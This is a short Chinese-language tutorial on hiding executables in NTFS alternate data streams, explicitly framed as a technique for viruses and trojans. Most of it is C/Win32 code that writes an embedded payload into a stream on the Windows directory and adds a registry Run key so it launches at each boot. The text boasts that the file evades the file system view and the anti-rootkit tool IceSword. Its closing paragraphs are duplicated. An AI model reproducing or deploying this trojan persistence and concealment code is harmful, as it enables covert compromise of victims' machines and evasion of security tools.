基于文件流的文件隐藏技术
alternate data streams(交换数据流).
NTFS交换数据
流(ADSs)是为了和Macintosh的HFS文件系统兼容而设计的,它使用资源派生(resource forks)来维持与文件,比如说图标及其他的东西.而微软提供了一种方法通过Windows explorer来创建特殊的ADSs,检测这种特殊的ADSs的必要工具和功能相当缺乏.说来也奇怪,系统一直以来都有允许用户创建ADSs以及在这种流文件.Microsoft KnowledgeBase 中Q101353号文章承认了基于API的win32不能很好的支持ADSs.中执行隐藏代码的功能和工具相关的信息
好了. 现在我们已经对这个流有个概念性的了解,下面开始讲解如何在病毒程序或者其它木马程序中应用这个流.
char buffer[]="c://windows:b.exe";//
注意这里的
:
而不是
/
HFILE hfile = _lcreat(buffer,0);
HRSRC rsrc;
HGLOBAL hglobal;
unsigned char * lpvoid;
DWORD DFileSize;
rsrc = FindResource(NULL,MAKEINTRESOURCE(IDR_RS_DATA1),"RS_DATA");
if (rsrc==NULL)
{
::MessageBox(NULL,"can't find the resource",NULL,MB_OK);
ExitProcess(0);
}
hglobal = LoadResource(NULL,rsrc);
DFileSize = SizeofResource(NULL,rsrc);
lpvoid = (unsigned char *)LockResource(hglobal);
UINT uwrite;
while(DFileSize--)
{
uwrite= _lwrite(hfile,(char *)lpvoid,1);
if(HFILE_ERROR==uwrite)
{
//MessageBox("write error");
}
lpvoid++;
}
if(hfile==HFILE_ERROR)
{
//printf("create file error/n");
exit(0);
}
_lclose(hfile);
HKEY phkey;
long keyopen = RegOpenKeyEx(
HKEY_CURRENT_USER,
"Software//Microsoft//Windows//CurrentVersion//Run",0,KEY_SET_VALUE,&phkey
);
if(keyopen!=ERROR_SUCCESS)
{
AfxMessageBox("error open key");
}
RegSetValueEx(phkey,"b.exe",0,REG_SZ,(const unsigned char *)buffer,sizeof(buffer));
RegCloseKey(phkey);
//return 0;
通过这个程序 ,我们就能创建一个ADS文件流了(这里的资源文件文件我用的是记事本程序).
重启之后,你就会发现记事本程序自动运行了.但是在文件系统中你根本找不到这个文件.而且IceSword也看不到.
这样一个基于ADS交换流的隐藏木马就完成了 .
但是这个流有一个局限就是只存于在基于NTFS的Windows系统中.
重启之后,你就会发现记事本程序自动运行了.但是在文件系统中你根本找不到这个文件.而且IceSword也看不到.
这样一个基于ADS交换流的隐藏木马就完成了 .
但是这个流有一个局限就是只存于在基于NTFS的Windows系统中.